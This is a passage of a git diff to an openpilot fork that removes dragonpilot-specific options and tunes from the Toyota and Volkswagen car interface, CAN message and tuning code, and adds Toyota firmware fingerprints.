0), - ] - - # use steering message to check if panda is connected to frc - checks = [ - ("RSA1", 0), - ("RSA2", 0), - ] - + signals = [] + checks = [] if CP.carFingerprint != CAR.PRIUS_V: signals += [ @@ -607,15 +374,11 @@ class CarState(CarStateBase): ("FORCE", "PRE_COLLISION"), ("ACC_TYPE", "ACC_CONTROL"), ("FCW", "ACC_HUD"), - #dp - ("DISTANCE_LINES", "PCM_CRUISE_SM"), - ("DISTANCE", "ACC_CONTROL"), ] checks += [ ("PRE_COLLISION", 33), ("ACC_CONTROL", 33), ("ACC_HUD", 1), - ("PCM_CRUISE_SM", 0), ] return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, 2) diff --git a/selfdrive/car/toyota/interface.py b/selfdrive/car/toyota/interface.py index 7b308219f..75f61609d 100644 --- a/selfdrive/car/toyota/interface.py +++ b/selfdrive/car/toyota/interface.py @@ -3,10 +3,9 @@ from cereal import car from common.conversions import Conversions as CV from panda import Panda from selfdrive.car.toyota.values import Ecu, CAR, DBC, ToyotaFlags, CarControllerParams, TSS2_CAR, RADAR_ACC_CAR, NO_DSU_CAR, \ - MIN_ACC_SPEED, EPS_SCALE, EV_HYBRID_CAR, UNSUPPORTED_DSU_CAR, NO_STOP_TIMER_CAR, ANGLE_CONTROL_CAR + MIN_ACC_SPEED, EPS_SCALE, EV_HYBRID_CAR, UNSUPPORTED_DSU_CAR, NO_STOP_TIMER_CAR, ANGLE_CONTROL_CAR from selfdrive.car import STD_CARGO_KG, scale_tire_stiffness, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase -from common.params import Params EventName = car.CarEvent.EventName SteerControlType = car.CarParams.SteerControlType @@ -45,7 +44,6 @@ class CarInterface(CarInterfaceBase): stop_and_go = False - params = Params() if candidate == CAR.PRIUS: stop_and_go = True ret.wheelbase = 2.70 @@ -53,14 +51,10 @@ class CarInterface(CarInterfaceBase): tire_stiffness_factor = 0.6371 # hand-tune ret.mass = 3045. * CV.LB_TO_KG + STD_CARGO_KG # Only give steer angle deadzone to for bad angle sensor prius - if params.get_bool("dp_toyota_prius_bad_angle_tune"): - ret.steerActuatorDelay = 0.25 - CarInterfaceBase.configure_torque_tune(candidate, ret.lateralTuning, steering_angle_deadzone_deg=0.2) - else: - for fw in car_fw: - if fw.ecu == "eps" and not fw.fwVersion == b'8965B47060\x00\x00\x00\x00\x00\x00': - ret.steerActuatorDelay = 0.25 - CarInterfaceBase.configure_torque_tune(candidate, ret.lateralTuning, steering_angle_deadzone_deg=0.2) + for fw in car_fw: + if fw.ecu == "eps" and not fw.fwVersion == b'8965B47060\x00\x00\x00\x00\x00\x00': + ret.steerActuatorDelay = 0.25 + CarInterfaceBase.configure_torque_tune(candidate, ret.lateralTuning, steering_angle_deadzone_deg=0.2) elif candidate == CAR.PRIUS_V: stop_and_go = True @@ -206,9 +200,6 @@ class CarInterface(CarInterfaceBase): tire_stiffness_factor = 0.444 ret.mass = 4305. * CV.LB_TO_KG + STD_CARGO_KG - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection, steering_angle_deadzone_deg = 0.0) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - ret.centerToFront = ret.wheelbase * 0.44 # TODO: start from empirically derived lateral slip stiffness for the civic and scale by @@ -247,12 +238,6 @@ class CarInterface(CarInterfaceBase): ret.openpilotLongitudinalControl = use_sdsu or ret.enableDsu or candidate in (TSS2_CAR - RADAR_ACC_CAR) ret.autoResumeSng = ret.openpilotLongitudinalControl and candidate in NO_STOP_TIMER_CAR - if int(Params().get("dp_atl").decode('utf-8')) == 1: - ret.openpilotLongitudinalControl = False - - if candidate == CAR.CHR_TSS2: - ret.enableBsm = True - if not ret.openpilotLongitudinalControl: ret.safetyConfigs[0].safetyParam |= Panda.FLAG_TOYOTA_STOCK_LONGITUDINAL @@ -271,26 +256,18 @@ class CarInterface(CarInterfaceBase): if candidate in TSS2_CAR or ret.enableGasInterceptor: tune.kpBP = [0., 5., 20.] tune.kpV = [1.3, 1.0, 0.7] - #tune.kpBP = [0., 5., 20., 30.] - #tune.kpV = [1.3, 1.0, 0.7, 0.1] - tune.kiBP = [0., 1., 2., 3., 4., 5., 12., 20., 27., 40.] - tune.kiV = [.348, .3361, .3168, .2831, .2571, .226, .198, .17, .10, .01] + tune.kiBP = [0., 5., 12., 20., 27.] + tune.kiV = [.35, .23, .20, .17, .1] if candidate in TSS2_CAR: - ret.vEgoStopping = 0.15 # car is near 0.1 to 0.2 when car starts requesting stopping accel - ret.vEgoStarting = 0.15 # needs to be > or == vEgoStopping - ret.stopAccel = -0.4 # Toyota requests -0.4 when stopped - ret.stoppingDecelRate = 0.05 # reach stopping target smoothly - seems to take 0.5 seconds to go from 0 to -0.4 - #ret.longitudinalActuatorDelayLowerBound = 0.2 - #ret.longitudinalActuatorDelayUpperBound = 0.2 - ### stock ### - #ret.vEgoStopping = 0.25 - #ret.vEgoStarting = 0.25 - #ret.stoppingDecelRate = 0.3 # reach stopping target smoothly + ret.vEgoStopping = 0.25 + ret.vEgoStarting = 0.25 + ret.stoppingDecelRate = 0.3 # reach stopping target smoothly else: tune.kpBP = [0., 5., 35.] tune.kiBP = [0., 35.] tune.kpV = [3.6, 2.4, 1.5] tune.kiV = [0.54, 0.36] + return ret # returns a car.CarState @@ -326,4 +303,4 @@ class CarInterface(CarInterfaceBase): # pass in a car.CarControl # to be called @ 100hz def apply(self, c, now_nanos): - return self.CC.update(c, self.CS, now_nanos, self.dragonconf) + return self.CC.update(c, self.CS, now_nanos) diff --git a/selfdrive/car/toyota/toyotacan.py b/selfdrive/car/toyota/toyotacan.py index bbab55840..01861c534 100644 --- a/selfdrive/car/toyota/toyotacan.py +++ b/selfdrive/car/toyota/toyotacan.py @@ -9,7 +9,7 @@ def create_steer_command(packer, steer, steer_req): return packer.make_can_msg("STEERING_LKA", 0, values) -def create_lta_steer_command(packer, steer_angle, steer_req, frame): +def create_lta_steer_command(packer, steer_angle, steer_req, frame, setme_x64): """Creates a CAN message for the Toyota LTA Steer Command.""" values = { @@ -17,27 +17,27 @@ def create_lta_steer_command(packer, steer_angle, steer_req, frame): "SETME_X1": 1, "SETME_X3": 3, "PERCENTAGE": 100, - "SETME_X64": 0, + "SETME_X64": setme_x64, "ANGLE": 0, "STEER_ANGLE_CMD": steer_angle, "STEER_REQUEST": steer_req, "STEER_REQUEST_2": steer_req, - "BIT": 0, + "CLEAR_HOLD_STEERING_ALERT": 0, } return packer.make_can_msg("STEERING_LTA", 0, values) -def create_accel_command(packer, accel, pcm_cancel, standstill_req, lead, acc_type, distance, dp_toyota_change5speed): +def create_accel_command(packer, accel, pcm_cancel, standstill_req, lead, acc_type): # TODO: find the exact canceling bit that does not create a chime values = { "ACCEL_CMD": accel, "ACC_TYPE": acc_type, - "DISTANCE": distance, + "DISTANCE": 0, "MINI_CAR": lead, "PERMIT_BRAKING": 1, "RELEASE_STANDSTILL": not standstill_req, "CANCEL_REQ": pcm_cancel, - "ALLOW_LONG_PRESS": 2 if dp_toyota_change5speed else 1, + "ALLOW_LONG_PRESS": 1, } return packer.make_can_msg("ACC_CONTROL", 0, values) diff --git a/selfdrive/car/toyota/tunes.py b/selfdrive/car/toyota/tunes.py deleted file mode 100644 index c3f8cf734..000000000 --- a/selfdrive/car/toyota/tunes.py +++ /dev/null @@ -1,129 +0,0 @@ -#!/usr/bin/env python3 -from enum import Enum - -class LongTunes(Enum): - TSS2 = 0 - TSS = 1 - -class LatTunes(Enum): - INDI_PRIUS = 0 - LQR_RAV4 = 1 - PID_A = 2 - PID_B = 3 - PID_C = 4 - PID_D = 5 - PID_E = 6 - PID_F = 7 - PID_G = 8 - PID_I = 9 - PID_H = 10 - PID_J = 11 - PID_K = 12 - PID_L = 13 - PID_M = 14 - PID_N = 15 - - INDI_PRIUS_TSS2 = 16 - - -###### LONG ###### -def set_long_tune(tune, name): - # Improved longitudinal tune - if name == LongTunes.TSS2: - tune.deadzoneBP = [0., 8.05] - tune.deadzoneV = [.0, .14] - tune.kpBP = [0., 5., 20., 30.] - tune.kpV = [1.3, 1.0, 0.7, 0.1] - #really smooth (make it toggleable) - #tune.kiBP = [0., 0.07, 5, 8, 11., 18., 20., 24., 33.] - #tune.kiV = [.001, .01, .1, .18, .21, .22, .23, .22, .001] - #okay ish - #tune.kiBP = [0., 11., 17., 20., 24., 30., 33., 40.] - #tune.kiV = [.001, .21, .22, .23, .22, .1, .001, .0001] - tune.kiBP = [0., 6., 8., 11., 30., 33., 40.] - tune.kiV = [.001, .07, .15, .2, .2, .01, .0001] - # Default longitudinal tune - elif name == LongTunes.TSS: - tune.deadzoneBP = [0., 9.] - tune.deadzoneV = [.0, .15] - tune.kpBP = [0., 5., 35.] - tune.kiBP = [0., 35.] - tune.kpV = [3.6, 2.4, 1.5] - tune.kiV = [0.54, 0.36] - else: - raise NotImplementedError('This longitudinal tune does not exist') - - -###### LAT ###### -def set_lat_tune(tune, name, MAX_LAT_ACCEL=2.5, FRICTION=0.01, steering_angle_deadzone_deg=0.0, use_steering_angle=True): - - if name == LatTunes.INDI_PRIUS_TSS2: - tune.init('indi') - #tune.indi.innerLoopGainBP = [20, 24, 30] - #tune.indi.innerLoopGainV = [7.25, 7.5, 9] - #tune.indi.outerLoopGainBP = [20, 24, 30] - #tune.indi.outerLoopGainV = [6, 7.25, 6] - #tune.indi.timeConstantBP = [20, 24] - #tune.indi.timeConstantV = [2.0, 2.2] - #tune.indi.actuatorEffectivenessBP = [20, 24] - #tune.indi.actuatorEffectivenessV = [2, 3] - tune.indi.innerLoopGainBP = [0.] - tune.indi.innerLoopGainV = [15] - tune.indi.outerLoopGainBP = [0.] - tune.indi.outerLoopGainV = [17] - tune.indi.timeConstantBP = [0.] - tune.indi.timeConstantV = [4.5] - tune.indi.actuatorEffectivenessBP = [0.] - tune.indi.actuatorEffectivenessV = [15] - elif 'PID' in str(name): - tune.init('pid') - tune.pid.kiBP = [0.0] - tune.pid.kpBP = [0.0] - if name == LatTunes.PID_A: - tune.pid.kpV = [0.2] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00003 - elif name == LatTunes.PID_C: - tune.pid.kpV = [0.6] - tune.pid.kiV = [0.1] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_D: - tune.pid.kpV = [0.6] - tune.pid.kiV = [0.1] - tune.pid.kf = 0.00007818594 - elif name == LatTunes.PID_F: - tune.pid.kpV = [0.723] - tune.pid.kiV = [0.0428] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_G: - tune.pid.kpV = [0.18] - tune.pid.kiV = [0.015] - tune.pid.kf = 0.00012 - elif name == LatTunes.PID_H: - tune.pid.kpV = [0.17] - tune.pid.kiV = [0.03] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_I: - tune.pid.kpV = [0.15] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00004 - elif name == LatTunes.PID_J: - tune.pid.kpV = [0.19] - tune.pid.kiV = [0.02] - tune.pid.kf = 0.00007818594 - elif name == LatTunes.PID_L: - tune.pid.kpV = [0.3] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_M: - tune.pid.kpV = [0.3] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00007 - elif name == LatTunes.PID_N: - tune.pid.kpV = [0.35] - tune.pid.kiV = [0.15] - tune.pid.kf = 0.00007818594 - else: - raise NotImplementedError('This PID tune does not exist') - else: - raise NotImplementedError('This lateral tune does not exist') diff --git a/selfdrive/car/toyota/values.py b/selfdrive/car/toyota/values.py index 0a18c9ed2..58e3464e3 100644 --- a/selfdrive/car/toyota/values.py +++ b/selfdrive/car/toyota/values.py @@ -24,17 +24,14 @@ class CarControllerParams: # Lane Tracing Assist (LTA) control limits # Assuming a steering ratio of 13.7: - # Limit to ~2.5 m/s^3 up (9 deg/s), ~3.6 m/s^3 down (13 deg/s) at 75 mph - # Worst case, the low speed limits will allow 4.9 m/s^3 up and down (18 deg/s) at 75 mph, + # Limit to ~2.0 m/s^3 up (7.5 deg/s), ~3.5 m/s^3 down (13 deg/s) at 75 mph + # Worst case, the low speed limits will allow ~4.0 m/s^3 up (15 deg/s) and ~4.9 m/s^3 down (18 deg/s) at 75 mph, # however the EPS has its own internal limits at all speeds which are less than that - ANGLE_RATE_LIMIT_UP = AngleRateLimit(speed_bp=[5, 25], angle_v=[0.36, 0.18]) + ANGLE_RATE_LIMIT_UP = AngleRateLimit(speed_bp=[5, 25], angle_v=[0.3, 0.15]) ANGLE_RATE_LIMIT_DOWN = AngleRateLimit(speed_bp=[5, 25], angle_v=[0.36, 0.26]) def __init__(self, CP): - self.update(CP.lateralTuning.which) - - def update(self, tune): - if tune == 'torque': + if CP.lateralTuning.which == 'torque': self.STEER_DELTA_UP = 15 # 1.0s time to peak torque self.STEER_DELTA_DOWN = 25 # always lower than 45 otherwise the Rav4 faults (Prius seems ok with 50) else: @@ -146,7 +143,7 @@ CAR_INFO: Dict[str, Union[ToyotaCarInfo, List[ToyotaCarInfo]]] = { ToyotaCarInfo("Toyota Corolla Hybrid 2020-22"), ToyotaCarInfo("Toyota Corolla Hybrid (Non-US only) 2020-23", min_enable_speed=7.5), ToyotaCarInfo("Toyota Corolla Cross Hybrid (Non-US only) 2020-22", min_enable_speed=7.5), - ToyotaCarInfo("Lexus UX Hybrid 2019-22"), + ToyotaCarInfo("Lexus UX Hybrid 2019-23"), ], CAR.HIGHLANDER: ToyotaCarInfo("Toyota Highlander 2017-19", video_link="https://www.youtube.com/watch?v=0wS0wXSLzoo"), CAR.HIGHLANDER_TSS2: ToyotaCarInfo("Toyota Highlander 2020-23"), @@ -200,7 +197,7 @@ CAR_INFO: Dict[str, Union[ToyotaCarInfo, List[ToyotaCarInfo]]] = { ToyotaCarInfo("Lexus RX Hybrid 2017-19"), ], CAR.LEXUS_RX_TSS2: ToyotaCarInfo("Lexus RX 2020-22"), - CAR.LEXUS_RXH_TSS2: ToyotaCarInfo("Lexus RX Hybrid 2020-21"), + CAR.LEXUS_RXH_TSS2: ToyotaCarInfo("Lexus RX Hybrid 2020-22"), } # (addr, cars, bus, 1/freq*100, vl) @@ -275,9 +272,8 @@ FW_QUERY_CONFIG = FwQueryConfig( # Responds to KWP (0x1a8881): # - Body Control Module ((0x750, 0x40)) - # Hybrid control computer can be on one of two addresses + # Hybrid control computer can be on 0x7e2 (KWP) or 0x7d2 (UDS) depending on platform (Ecu.hybrid, 0x7e2, None), # Hybrid Control Assembly & Computer - (Ecu.hybrid, 0x7d2, None), # Hybrid Control Assembly & Computer # TODO: if these duplicate ECUs always exist together, remove one (Ecu.srs, 0x780, None), # SRS Airbag (Ecu.srs, 0x784, None), # SRS Airbag 2 @@ -989,6 +985,7 @@ FW_VERSIONS = { b'8965B16170\x00\x00\x00\x00\x00\x00', b'8965B76012\x00\x00\x00\x00\x00\x00', b'8965B76050\x00\x00\x00\x00\x00\x00', + b'8965B76091\x00\x00\x00\x00\x00\x00', b'\x018965B12350\x00\x00\x00\x00\x00\x00', b'\x018965B12470\x00\x00\x00\x00\x00\x00', b'\x018965B12490\x00\x00\x00\x00\x00\x00', @@ -1019,12 +1016,14 @@ FW_VERSIONS = { b'F152676293\x00\x00\x00\x00\x00\x00', b'F152676303\x00\x00\x00\x00\x00\x00', b'F152676304\x00\x00\x00\x00\x00\x00', + b'F152676371\x00\x00\x00\x00\x00\x00', ], (Ecu.fwdRadar, 0x750, 0xf): [ b'\x018821F3301100\x00\x00\x00\x00', b'\x018821F3301200\x00\x00\x00\x00', b'\x018821F3301300\x00\x00\x00\x00', b'\x018821F3301400\x00\x00\x00\x00', + b'\x018821F6201400\x00\x00\x00\x00', ], (Ecu.fwdCamera, 0x750, 0x6d): [ b'\x028646F12010D0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00', @@ -1041,6 +1040,7 @@ FW_VERSIONS = { b'\x028646F76020C0\x00\x00\x00\x008646G26011A0\x00\x00\x00\x00', b'\x028646F7603100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00', b'\x028646F7603200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00', + b'\x028646F7605100\x00\x00\x00\x008646G3304000\x00\x00\x00\x00', ], }, CAR.HIGHLANDER: { @@ -1642,12 +1642,20 @@ FW_VERSIONS = { CAR.RAV4H_TSS2_2023: { (Ecu.abs, 0x7b0, None): [ b'\x01F15264283200\x00\x00\x00\x00', + b'\x01F15264283300\x00\x00\x00\x00', ], (Ecu.eps, 0x7a1, None): [ b'\x028965B0R11000\x00\x00\x00\x008965B0R12000\x00\x00\x00\x00', + b'8965B42371\x00\x00\x00\x00\x00\x00', ], (Ecu.engine, 0x700, None): [ b'\x01896634AE1001\x00\x00\x00\x00', + b'\x01896634AF0000\x00\x00\x00\x00', + ], + (Ecu.hybrid, 0x7d2, None): [ + b'\x02899830R41000\x00\x00\x00\x00899850R20000\x00\x00\x00\x00', + b'\x028998342C0000\x00\x00\x00\x00899854224000\x00\x00\x00\x00', + b'\x02899830R39000\x00\x00\x00\x00899850R20000\x00\x00\x00\x00', ], (Ecu.fwdRadar, 0x750, 0xf): [ b'\x018821F0R03100\x00\x00\x00\x00', @@ -2121,15 +2129,16 @@ FW_VERSIONS = { b'F152648811\x00\x00\x00\x00\x00\x00', ], (Ecu.eps, 0x7a1, None): [ - b'8965B48271\x00\x00\x00\x00\x00\x00', b'8965B48261\x00\x00\x00\x00\x00\x00', + b'8965B48271\x00\x00\x00\x00\x00\x00', ], (Ecu.fwdRadar, 0x750, 0xf): [ b'\x018821F3301400\x00\x00\x00\x00', ], (Ecu.fwdCamera, 0x750, 0x6d): [ - b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00', b'\x028646F4810100\x00\x00\x00\x008646G2601200\x00\x00\x00\x00', + b'\x028646F4810200\x00\x00\x00\x008646G2601400\x00\x00\x00\x00', + b'\x028646F4810300\x00\x00\x00\x008646G2601400\x00\x00\x00\x00', ], }, CAR.PRIUS_TSS2: { @@ -2137,6 +2146,7 @@ FW_VERSIONS = { b'\x028966347B1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00', b'\x028966347C4000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00', b'\x028966347C6000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00', + b'\x028966347C7000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00', b'\x028966347C8000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00', b'\x038966347C0000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710101\x00\x00\x00\x00', b'\x038966347C1000\x00\x00\x00\x008966A4703000\x00\x00\x00\x00897CF4710101\x00\x00\x00\x00', @@ -2288,4 +2298,4 @@ EV_HYBRID_CAR = {CAR.AVALONH_2019, CAR.AVALONH_TSS2, CAR.CAMRYH, CAR.CAMRYH_TSS2 CAR.LEXUS_RXH_TSS2, CAR.LEXUS_NXH_TSS2, CAR.PRIUS_TSS2, CAR.ALPHARDH_TSS2} # no resume button press required -NO_STOP_TIMER_CAR = TSS2_CAR | {CAR.PRIUS_V, CAR.RAV4H, CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.SIENNA, CAR.LEXUS_ESH, CAR.AVALONH_2019} +NO_STOP_TIMER_CAR = TSS2_CAR | {CAR.PRIUS_V, CAR.RAV4H, CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.SIENNA, CAR.LEXUS_ESH} diff --git a/selfdrive/car/tunes.py b/selfdrive/car/tunes.py deleted file mode 100644 index 69ac84579..000000000 --- a/selfdrive/car/tunes.py +++ /dev/null @@ -1,181 +0,0 @@ -#!/usr/bin/env python3 -from enum import Enum - -class LatTunes(Enum): - #TOYOTA - INDI_PRIUS = 0 - LQR_RAV4 = 1 - PID_A = 2 - PID_B = 3 - PID_C = 4 - PID_D = 5 - PID_E = 6 - PID_F = 7 - PID_G = 8 - PID_I = 9 - PID_H = 10 - PID_J = 11 - PID_K = 12 - PID_L = 13 - PID_M = 14 - PID_N = 15 - INDI_PRIUS_TSS2 = 16 - - #HKG - PID_HYUNDAI_A = 17 - PID_HYUNDAI_B = 18 - PID_HYUNDAI_C = 19 - PID_HYUNDAI_D = 20 - PID_HYUNDAI_E = 21 - PID_HYUNDAI_F = 22 - PID_HYUNDAI_G = 23 - - #VW - PID_VW = 24 - - #SUBARU - PID_SUBARU_A = 25 - PID_SUBARU_B = 26 - PID_SUBARU_C = 27 - PID_SUBARU_D = 28 - PID_SUBARU_E = 29 - PID_SUBARU_F = 30 - -###### LAT ###### -def set_lat_tune(tune, name, MAX_LAT_ACCEL=2.5, FRICTION=0.01, steering_angle_deadzone_deg=0.0, use_steering_angle=True): - - #TODO: add toggle for sepcial prius_tss2 indi - if name == LatTunes.INDI_PRIUS_TSS2: - tune.init('indi') - #tune.indi.innerLoopGainBP = [20, 24, 30] - #tune.indi.innerLoopGainV = [7.25, 7.5, 9] - #tune.indi.outerLoopGainBP = [20, 24, 30] - #tune.indi.outerLoopGainV = [6, 7.25, 6] - #tune.indi.timeConstantBP = [20, 24] - #tune.indi.timeConstantV = [2.0, 2.2] - #tune.indi.actuatorEffectivenessBP = [20, 24] - #tune.indi.actuatorEffectivenessV = [2, 3] - tune.indi.innerLoopGainBP = [0.] - tune.indi.innerLoopGainV = [15] - tune.indi.outerLoopGainBP = [0.] - tune.indi.outerLoopGainV = [17] - tune.indi.timeConstantBP = [0.] - tune.indi.timeConstantV = [4.5] - tune.indi.actuatorEffectivenessBP = [0.] - tune.indi.actuatorEffectivenessV = [15] - elif 'PID' in str(name): - tune.init('pid') - tune.pid.kiBP = [0.0] - tune.pid.kpBP = [0.0] - if name == LatTunes.PID_A: - tune.pid.kpV = [0.2] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00003 - elif name == LatTunes.PID_C: - tune.pid.kpV = [0.6] - tune.pid.kiV = [0.1] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_D: - tune.pid.kpV = [0.6] - tune.pid.kiV = [0.1] - tune.pid.kf = 0.00007818594 - elif name == LatTunes.PID_F: - tune.pid.kpV = [0.723] - tune.pid.kiV = [0.0428] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_G: - tune.pid.kpV = [0.18] - tune.pid.kiV = [0.015] - tune.pid.kf = 0.00012 - elif name == LatTunes.PID_H: - tune.pid.kpV = [0.17] - tune.pid.kiV = [0.03] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_I: - tune.pid.kpV = [0.15] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00004 - elif name == LatTunes.PID_J: - tune.pid.kpV = [0.19] - tune.pid.kiV = [0.02] - tune.pid.kf = 0.00007818594 - elif name == LatTunes.PID_L: - tune.pid.kpV = [0.3] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00006 - elif name == LatTunes.PID_M: - tune.pid.kpV = [0.3] - tune.pid.kiV = [0.05] - tune.pid.kf = 0.00007 - elif name == LatTunes.PID_N: - tune.pid.kpV = [0.35] - tune.pid.kiV = [0.15] - tune.pid.kf = 0.00007818594 - - # hyundai - elif name == LatTunes.PID_HYUNDAI_A: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[0.], [0.]] - tune.pid.kpV, tune.pid.kiV = [[0.25], [0.05]] - elif name == LatTunes.PID_HYUNDAI_B: - tune.pid.kf = 0.00006 - tune.pid.kiBP, tune.pid.kpBP = [[0.], [0.]] - tune.pid.kpV, tune.pid.kiV = [[0.25], [0.05]] - elif name == LatTunes.PID_HYUNDAI_C: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[0.], [0.]] - tune.pid.kpV, tune.pid.kiV = [[0.3], [0.05]] - elif name == LatTunes.PID_HYUNDAI_D: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[9., 22.], [9., 22.]] - tune.pid.kpV, tune.pid.kiV = [[0.2, 0.35], [0.05, 0.09]] - elif name == LatTunes.PID_HYUNDAI_E: - tune.pid.kf = 0. - tune.pid.kiBP, tune.pid.kpBP = [[0.], [0.]] - tune.pid.kpV, tune.pid.kiV = [[0.112], [0.004]] - elif name == LatTunes.PID_HYUNDAI_F: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[0.], [0.]] - tune.pid.kpV, tune.pid.kiV = [[0.16], [0.01]] - elif name == LatTunes.PID_HYUNDAI_G: - tune.pid.kiBP, tune.pid.kpBP = [[0.], [0.]] - tune.pid.kpV, tune.pid.kiV = [[0.16], [0.01]] - - # vw - elif name == LatTunes.PID_VW: - tune.pid.kpBP = [0.] - tune.pid.kiBP = [0.] - tune.pid.kf = 0.00006 - tune.pid.kpV = [0.6] - tune.pid.kiV = [0.2] - - # subaru - elif name == LatTunes.PID_SUBARU_A: - tune.pid.kf = 0.00003 - tune.pid.kiBP, tune.pid.kpBP = [[0., 20.], [0., 20.]] - tune.pid.kpV, tune.pid.kiV = [[0.0025, 0.1], [0.00025, 0.01]] - elif name == LatTunes.PID_SUBARU_B: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[0., 20.], [0., 20.]] - tune.pid.kpV, tune.pid.kiV = [[0.2, 0.3], [0.02, 0.03]] - elif name == LatTunes.PID_SUBARU_C: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[0., 14., 23.], [0., 14., 23.]] - tune.pid.kpV, tune.pid.kiV = [[0.045, 0.042, 0.20], [0.04, 0.035, 0.045]] - elif name == LatTunes.PID_SUBARU_D: - tune.pid.kf = 0.000038 - tune.pid.kiBP, tune.pid.kpBP = [[0., 14., 23.], [0., 14., 23.]] - tune.pid.kpV, tune.pid.kiV = [[0.01, 0.065, 0.2], [0.001, 0.015, 0.025]] - elif name == LatTunes.PID_SUBARU_E: - tune.pid.kf = 0.000039 - tune.pid.kiBP, tune.pid.kpBP = [[0., 10., 20.], [0., 10., 20.]] - tune.pid.kpV, tune.pid.kiV = [[0.01, 0.05, 0.2], [0.003, 0.018, 0.025]] - elif name == LatTunes.PID_SUBARU_F: - tune.pid.kf = 0.00005 - tune.pid.kiBP, tune.pid.kpBP = [[0., 20.], [0., 20.]] - tune.pid.kpV, tune.pid.kiV = [[0.1, 0.2], [0.01, 0.02]] - - else: - raise NotImplementedError('This PID tune does not exist') - else: - raise NotImplementedError('This lateral tune does not exist') diff --git a/selfdrive/car/volkswagen/carcontroller.py b/selfdrive/car/volkswagen/carcontroller.py index fba00c3af..4db560621 100644 --- a/selfdrive/car/volkswagen/carcontroller.py +++ b/selfdrive/car/volkswagen/carcontroller.py @@ -81,7 +81,7 @@ class CarController: hud_alert = 0 if hud_control.visualAlert in (VisualAlert.steerRequired, VisualAlert.ldw): hud_alert = self.CCP.LDW_MESSAGES["laneAssistTakeOver"] - can_sends.append(self.CCS.create_lka_hud_control(self.packer_pt, CANBUS.pt, CS.ldw_stock_values, CC.latActive, + can_sends.append(self.CCS.create_lka_hud_control(self.packer_pt, CANBUS.pt, CS.ldw_stock_values, CC.enabled, CS.out.steeringPressed, hud_alert, hud_control)) if self.frame % self.CCP.ACC_HUD_STEP == 0 and self.CP.openpilotLongitudinalControl: diff --git a/selfdrive/car/volkswagen/carstate.py b/selfdrive/car/volkswagen/carstate.py index d1dc236dc..f3cd2808a 100644 --- a/selfdrive/car/volkswagen/carstate.py +++ b/selfdrive/car/volkswagen/carstate.py @@ -67,8 +67,6 @@ class CarState(CarStateBase): brake_pressure_detected = bool(pt_cp.vl["ESP_05"]["ESP_Fahrer_bremst"]) ret.brakePressed = brake_pedal_pressed or brake_pressure_detected ret.parkingBrake = bool(pt_cp.vl["Kombi_01"]["KBI_Handbremse"]) # FIXME: need to include an EPB check as well - #dp - ret.brakeLightsDEPRECATED = bool(pt_cp.vl["ESP_05"]['ESP_Status_Bremsdruck'] or ret.brakePressed or ret.parkingBrake) # Update gear and/or clutch position data. if trans_type == TransmissionType.automatic: @@ -301,8 +299,6 @@ class CarState(CarStateBase): ("GRA_Tip_Stufe_2", "GRA_ACC_01"), # unknown related to stalk type ("GRA_ButtonTypeInfo", "GRA_ACC_01"), # unknown related to stalk type ("COUNTER", "GRA_ACC_01"), # GRA_ACC_01 CAN message counter - #dp - ("ESP_Status_Bremsdruck", "ESP_05"), # Brakes applied ] checks = [ diff --git a/selfdrive/car/volkswagen/interface.py b/selfdrive/car/volkswagen/interface.py index 4e626052f..2b0603f16 100644 --- a/selfdrive/car/volkswagen/interface.py +++ b/selfdrive/car/volkswagen/interface.py @@ -4,7 +4,6 @@ from common.conversions import Conversions as CV from selfdrive.car import STD_CARGO_KG, get_safety_config from selfdrive.car.interfaces import CarInterfaceBase from selfdrive.car.volkswagen.values import CAR, PQ_CARS, CANBUS, NetworkLocation, TransmissionType, GearShifter -from common.params import Params ButtonType = car.CarState.ButtonEvent.Type EventName = car.CarEvent.EventName @@ -81,12 +80,8 @@ class CarInterface(CarInterfaceBase): # Global longitudinal tuning defaults, can be overridden per-vehicle - dp_atl = int(Params().get("dp_atl").decode('utf-8')) - if dp_atl == 1: - ret.openpilotLongitudinalControl = False - ret.experimentalLongitudinalAvailable = ret.networkLocation == NetworkLocation.gateway or docs - if experimental_long and dp_atl != 1: + if experimental_long: # Proof-of-concept, prep for E2E only. No radar points available. Panda ALLOW_DEBUG firmware required. ret.openpilotLongitudinalControl = True ret.safetyConfigs[0].safetyParam |= Panda.FLAG_VOLKSWAGEN_LONG_CONTROL @@ -224,9 +219,6 @@ class CarInterface(CarInterfaceBase): else: raise ValueError(f"unsupported car {candidate}") - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - 